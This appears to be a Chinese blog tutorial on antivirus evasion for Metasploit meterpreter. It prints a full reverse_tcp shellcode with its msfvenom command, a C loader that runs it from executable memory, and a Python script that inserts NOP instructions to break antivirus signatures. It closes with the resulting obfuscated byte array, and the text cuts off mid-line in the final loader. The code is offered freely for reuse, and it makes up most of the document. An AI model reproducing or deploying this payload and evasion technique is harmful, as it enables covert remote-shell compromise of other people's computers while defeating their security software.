浅谈meterpreter免杀

01

前言

最近玩了玩免杀，学习了很多免杀的技巧，免杀基本就那么几个套路，静态文件特征码免杀，内存特征码免杀，行为免杀，流量免杀等等等

02

正文

首先用msfvenom生成一个payload，msfvenom–p windows/meterpreter/reverse_tcp lhost=yourip lport=yourport –fc

以下是我们meterpreter的原型，首先我们把shellcode复制到新申请的可执行的内存区域中去，然后把指针转换成函数指针然后执行就ok了。

#include

#include

unsignedcharbuf[] =

"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"

"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"

"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"

"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"

"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"

"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"

"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"

"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"

"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"

"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"

"\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"

"\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\x7f\x00\x00\x01"

"\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"

"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"

"\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67"

"\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"

"\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00"

"\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56"

"\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"

"\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5"

"\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85"

"\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1"

"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";

intmain(){

void*ptr=(void*)VirtualAlloc(NULL,sizeof(buf)+1,MEM_COMMIT,PAGE_EXECUTE_READWRITE);

memcpy(ptr,buf,sizeof(buf));

(*(void(*)())ptr)();

return0;

}

这个原始的meterpreter是很不理想的

丢到virustotal会发现70个杀软有22个都能检测出来，我们现在把shellcode编码一下，我们不使用msf自带的编码器，况且msf自带的编码器不止会给shellcode编码，还会把解密代码放到shellcode前面，所以说编码的时候很受限制，我们如今编码的话，shellcode在我们手中，我们只需要把解密代码实现就好了，不需要放到shellcode里，没有这样那样的限制，就可以想怎么搞怎么搞了，并且我们不用公开的编码方式的话，就更好了，比如把shellcode对应的每个字节都加一，或者异或加密，这样就可以实现静态特征码免杀了，但是加载到内存里解密以后还是会被杀毒软件找到特征码，于是我想了一个办法，可以在每句汇编代码中插入一个不影响堆栈平衡的nop指令，来实现”隔断”特征码，如下是我用python写的脚本，大致逻辑就是先获取跳转指令的跳转目的地，然后在跳转目的指令处加上标号，再把跳转指令都改成跳转到标号的这种形式，再插入nop指令，再进行编译，这样可以省了校准跳转地址的好多时间，脚本如下，大哥们可以自取。用这个脚本把shellcode处理完就会发现，报毒的杀软少了好几个，并且之前defender识别出的meterpreter字眼没有了。

from capstone import*

from keystone import*

controlflow=["jmp","jz","jnz","je","jne","call","jl","ja","loop","jecxz","jle","jge","jg","jp","jnl"]

registers=["eax","ebx","edx","ebp","esp","edi","esi"]

asm="cld ;call0x88;pushal ;mov ebp, esp;xor eax, eax;mov edx, dword ptr fs:[eax +0x30];mov edx, dword ptr [edx + 0xc];mov edx, dword ptr [edx +0x14];mov esi, dword ptr [edx + 0x28];movzx ecx, word ptr [edx +0x26];xor edi, edi;lodsb al, byte ptr [esi];cmp al, 0x61;jl 0x25;subal, 0x20;ror edi, 0xd;add edi, eax;loop 0x1e;push edx;push edi;movedx, dword ptr [edx + 0x10];mov ecx, dword ptr [edx + 0x3c];mov ecx,dword ptr [ecx + edx + 0x78];jecxz 0x82;add ecx, edx;push ecx;movebx, dword ptr [ecx + 0x20];add ebx, edx;mov ecx, dword ptr [ecx +0x18];jecxz 0x81;dec ecx;mov esi, dword ptr [ebx + ecx*4];add esi,edx;xor edi, edi;lodsb al, byte ptr [esi];ror edi, 0xd;add edi,eax;cmp al, ah;jne 0x4f;add edi, dword ptr [ebp - 8];cmp edi, dwordptr [ebp + 0x24];jne 0x45;pop eax;mov ebx, dword ptr [eax + 0x24];addebx, edx;mov cx, word ptr [ebx + ecx*2];mov ebx, dword ptr [eax +0x1c];add ebx, edx;mov eax, dword ptr [ebx + ecx*4];add eax, edx;movdword ptr [esp + 0x24], eax;pop ebx;pop ebx;popal ;pop ecx;popedx;push ecx;jmp eax;pop edi;pop edi;pop edx;mov edx, dword ptr[edx];jmp 0x15;pop ebp;push 0x3233;push 0x5f327377;push esp;push0x726774c;mov eax, ebp;call eax;mov eax, 0x190;sub esp, eax;pushesp;push eax;push 0x6b8029;call ebp;push 0xa;push 0x100007f;push0x5c110002;mov esi, esp;push eax;push eax;push eax;push eax;inceax;push eax;inc eax;push eax;push 0xe0df0fea;call ebp;xchg eax,edi;push 0x10;push esi;push edi;push 0x6174a599;call ebp;test eax,eax;je 0xe4;dec dword ptr [esi + 8];jne 0xcb;call 0x14b;push 0;push4;push esi;push edi;push 0x5fc8d902;call ebp;cmp eax, 0;jle 0x12c;movesi, dword ptr [esi];push 0x40;push 0x1000;push esi;push 0;push0xe553a458;call ebp;xchg eax, ebx;push ebx;push 0;push esi;pushebx;push edi;push 0x5fc8d902;call ebp;cmp eax, 0;jge 0x144;popeax;push 0x4000;push 0;push eax;push 0x300f2f0b;call ebp;pushedi;push 0x614d6e75;call ebp;pop esi;pop esi;dec dword ptr [esp];jne0xaf;jmp 0xdf;add ebx, eax;sub esi, eax;jne 0x10b;ret ;mov ebx,0x56a2b5f0;push 0;push ebx;call ebp"

asmarray=asm.split(";")

length=len(asmarray)

def assemble(code):

try:

ks =Ks(KS_ARCH_X86, KS_MODE_32)

encoding, count =ks.asm(code)

return [hex(i) fori in encoding]

except KsError ase:

print(e)

return -1

CODE =b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\x7f\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"

defbyteoffset2index(offset):

temp=offset

a=0

for i inmd.disasm(CODE, 0x0):

temp-=len(i.bytes)

a+=1

if temp==0:

return a

if __name__ =="__main__":

md =Cs(CS_ARCH_X86, CS_MODE_32)

tags=[]

for i inrange(0,len(asmarray)):

for mnemonic incontrolflow:

if (mnemonic inasmarray[i]):

tags.append(i)

mask=[]

for i inrange(0,len(tags)):

for reg inregisters:

if (reg inasmarray[tags[i]]):

mask.append(tags[i])

[tags.remove(i) fori in mask]

tagins=[asmarray[i] for i in tags]

revision=[]

for i inrange(0,len(tagins)):

b=tagins[i][tagins[i].index("0x"):]

n=byteoffset2index(int(b,16))

revision.append(n)

revision_unique=list(set(revision))

for i inrange(0,len(revision_unique)):

asmarray[revision_unique[i]]="a"+str(revision_unique[i])+":"+asmarray[revision_unique[i]]

tagins=[asmarray[i] for i in tags]

for i inrange(0,len(tags)):

asmarray[tags[i]]=tagins[i][:tagins[i].index("0x")]+"a"+str(revision[i])

obfuscation="nop"

code=(";"+obfuscation+";").join(asmarray)

#print(code)

print("unsignedcharbuf[]="+str(assemble(code)).replace("\'","").replace("[","{").replace("]","}")+";")

#print("\\x"+"\\x".join([("00000"+i.lstrip("0x"))[-2:]for i in assemble(code)])

运行后复制unsignedchar数组

然后对应vs2010里建立工程，源代码如下

voidmain(){

unsignedcharbuf[]={0xfc, 0x90, 0xe8, 0xce, 0x0, 0x0, 0x0, 0x90, 0x60, 0x90, 0x89,0xe5, 0x90, 0xb8, 0x0, 0x0, 0x0, 0x0, 0x90, 0x64, 0x8b, 0x50, 0x30,0x90, 0x8b, 0x52, 0xc, 0x90, 0x8b, 0x52, 0x14, 0x90, 0x8b, 0x72,0x28, 0x90, 0xf, 0xb7, 0x4a, 0x26, 0x90, 0xbf, 0x0, 0x0, 0x0, 0x0,0x90, 0xac, 0x90, 0x3c, 0x61, 0x90, 0x7c, 0x4, 0x90, 0x4, 0xe0, 0x90,0xc1, 0xcf, 0xd, 0x90, 0x1, 0xc7, 0x90, 0xe2, 0xec, 0x90, 0x52, 0x90,0x57, 0x90, 0x8b, 0x52, 0x10, 0x90, 0x8b, 0x4a, 0x3c, 0x90, 0x8b,0x4c, 0x11, 0x78, 0x90, 0xe3, 0x71, 0x90, 0x1, 0xd1, 0x90, 0x51,0x90, 0x8b, 0x59, 0x20, 0x90, 0x1, 0xd3, 0x90, 0x8b, 0x49, 0x18,0x90, 0xe3, 0x5c, 0x90, 0x83, 0xe9, 0x1, 0x90, 0x8b, 0x34, 0x8b,0x90, 0x1, 0xd6, 0x90, 0xbf, 0x0, 0x0, 0x0, 0x0, 0x90, 0xac, 0x90,0xc1, 0xcf, 0xd, 0x90, 0x1, 0xc7, 0x90, 0x38, 0xe0, 0x90, 0x75, 0xf2,0x90, 0x3, 0x7d, 0xf8, 0x90, 0x3b, 0x7d, 0x24, 0x90, 0x75, 0xd3,0x90, 0x58, 0x90, 0x8b, 0x58, 0x24, 0x90, 0x1, 0xd3, 0x90, 0x66,0x8b, 0xc, 0x4b, 0x90, 0x8b, 0x58, 0x1c, 0x90, 0x1, 0xd3, 0x90, 0x8b,0x4, 0x8b, 0x90, 0x1, 0xd0, 0x90, 0x89, 0x44, 0x24, 0x24, 0x90, 0x5b,0x90, 0x5b, 0x90, 0x61, 0x90, 0x59, 0x90, 0x5a, 0x90, 0x51, 0x90,0xff, 0xe0, 0x90, 0x5f, 0x90, 0x5f, 0x90, 0x5a, 0x90, 0x8b, 0x12,0x90, 0xe9, 0x4c, 0xff, 0xff, 0xff, 0x90, 0x5d, 0x90, 0x68, 0x33,0x32, 0x0, 0x0, 0x90, 0x68, 0x77, 0x73, 0x32, 0x5f, 0x90, 0x54, 0x90,0x68, 0x4c, 0x77, 0x26, 0x7, 0x90, 0x89, 0xe8, 0x90, 0xff, 0xd0,0x90, 0xb8, 0x90, 0x1, 0x0, 0x0, 0x90, 0x29, 0xc4, 0x90, 0x54, 0x90,0x50, 0x90, 0x68, 0x29, 0x80, 0x6b, 0x0, 0x90, 0xff, 0xd5, 0x90,0x6a, 0xa, 0x90, 0x68, 0x7f, 0x0, 0x0, 0x1, 0x90, 0x68, 0x2, 0x0,0x11, 0x5c, 0x90, 0x89, 0xe6, 0x90, 0x50, 0x90, 0x50, 0x90, 0x50,0x90, 0x50, 0x90, 0x83, 0xc0, 0x1, 0x90, 0x50, 0x90, 0x83, 0xc0, 0x1,0x90, 0x50, 0x90, 0x68, 0xea, 0xf, 0xdf, 0xe0, 0x90, 0xff, 0xd5,0x90, 0x97, 0x90, 0x6a, 0x10, 0x90, 0x56, 0x90, 0x57, 0x90, 0x68,0x99, 0xa5, 0x74, 0x61, 0x90, 0xff, 0xd5, 0x90, 0x85, 0xc0, 0x90,0x74, 0xe, 0x90, 0xff, 0x4e, 0x8, 0x90, 0x75, 0xe4, 0x90, 0xe8, 0x93,0x0, 0x0, 0x0, 0x90, 0x6a, 0x0, 0x90, 0x6a, 0x4, 0x90, 0x56, 0x90,0x57, 0x90, 0x68, 0x2, 0xd9, 0xc8, 0x5f, 0x90, 0xff, 0xd5, 0x90,0x83, 0xf8, 0x0, 0x90, 0x7e, 0x4e, 0x90, 0x8b, 0x36, 0x90, 0x6a,0x40, 0x90, 0x68, 0x0, 0x10, 0x0, 0x0, 0x90, 0x56, 0x90, 0x6a, 0x0,0x90, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0x90, 0xff, 0xd5, 0x90, 0x93,0x90, 0x53, 0x90, 0x6a, 0x0, 0x90, 0x56, 0x90, 0x53, 0x90, 0x57,0x90, 0x68, 0x2, 0xd9, 0xc8, 0x5f, 0x90, 0xff, 0xd5, 0x90, 0x83,0xf8, 0x0, 0x90, 0x7d, 0x37, 0x90, 0x58, 0x90, 0x68, 0x0, 0x40, 0x0,0x0, 0x90, 0x6a, 0x0, 0x90, 0x50, 0x90, 0x68, 0xb, 0x2f, 0xf, 0x30,0x90, 0xff, 0xd5, 0x90, 0x57, 0x90, 0x68, 0x75, 0x6e, 0x4d, 0x61,0x90, 0xff, 0xd5, 0x90, 0x5e, 0x90, 0x5e, 0x90, 0xff, 0xc, 0x24,0x90, 0xf, 0x85, 0x2f, 0xff, 0xff, 0xff, 0x90, 0xe9, 0x74, 0xff,0xff, 0xff, 0x90, 0x1, 0xc3, 0x90, 0x29, 0xc6, 0x90, 0x75, 0xa9,0x90, 0xc3, 0x90, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x90, 0x6a, 0x0,0x90, 0x53, 0x90, 0xff, 0xd5};

BYTE*sc=(BYTE*)VirtualAlloc(NULL,sizeof(buf)+1,MEM_COMMIT,PAGE_EXECUTE_READWRITE);

//memcpy(sc,buf,sizeof(buf));

for(inti=0;i